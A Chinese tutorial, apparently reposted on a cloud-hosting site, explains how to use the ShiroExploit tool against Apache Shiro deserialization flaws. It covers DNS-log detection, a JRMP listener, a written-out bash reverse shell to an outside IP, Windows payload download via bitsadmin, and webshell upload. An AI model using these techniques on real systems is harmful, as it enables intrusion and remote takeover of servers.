您好,登錄后才能下訂單哦!
本篇內容主要講解“Shiro漏洞檢測工具ShiroExploit怎么使用”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“Shiro漏洞檢測工具ShiroExploit怎么使用”吧!
支持對Shiro550(硬編碼秘鑰)和Shiro721(Padding Oracle)的一鍵化檢測,支持簡單回顯。
Shiro550
無需提供rememberMe Cookie, Shiro721
需要提供一個有效的rememberMe CookieShiro550
無需選擇操作系統類型, Shiro721
需要選擇操作系統類型使用 ceye.io 進行漏洞檢測
URLDNS
篩選出唯一 Key,然后依次調用各個 Gadget 生成 Payload使用 dnslog.cn 進行漏洞檢測
dnslog.cn
申請一個 DNS Record。URLDNS
篩選出唯一 Key,然后依次調用各個 Gadget 生成 Payload使用 JRMP + dnslog 進行漏洞檢測
java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port]
開啟HttpService/JRMPListener,并按照要求填入相應 IP 和端口HTTPService
默認監聽 8080
端口, JRMPListener
默認監聽 8088
端口JRMP
的方式進行漏洞檢測,可以顯著減小 cookie 大小URLDNS
篩選出唯一 Key,然后使用 JRMP
依次為各個 Gadget 生成對應的 JRMPListener使用回顯進行漏洞檢測
https://blog.csdn.net/fnmsd/article/details/106709736
介紹的方式實現回顯,在本地可以測試成功,但是在實際環境中基本不成功(可能是我的姿勢有問題,歡迎探討),所以目前是通過讀寫文件的方式實現回顯,后期可能會加入其它方式反彈shell(linux)
采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1
的方式反彈 shell反彈shell(Windows)
采用 bitsadmin
下載指定 URL 的 exe 文件并執行的方式獲取 shell獲取Webshell
可以在能夠回顯的情況下直接在使用者給出的路徑(目錄需要真實存在)下寫入 webshell, webshell 名稱和后綴名由使用者自行指定,webshell 的內容從 config 目錄下的 shell.jsp 中讀取到此,相信大家對“Shiro漏洞檢測工具ShiroExploit怎么使用”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。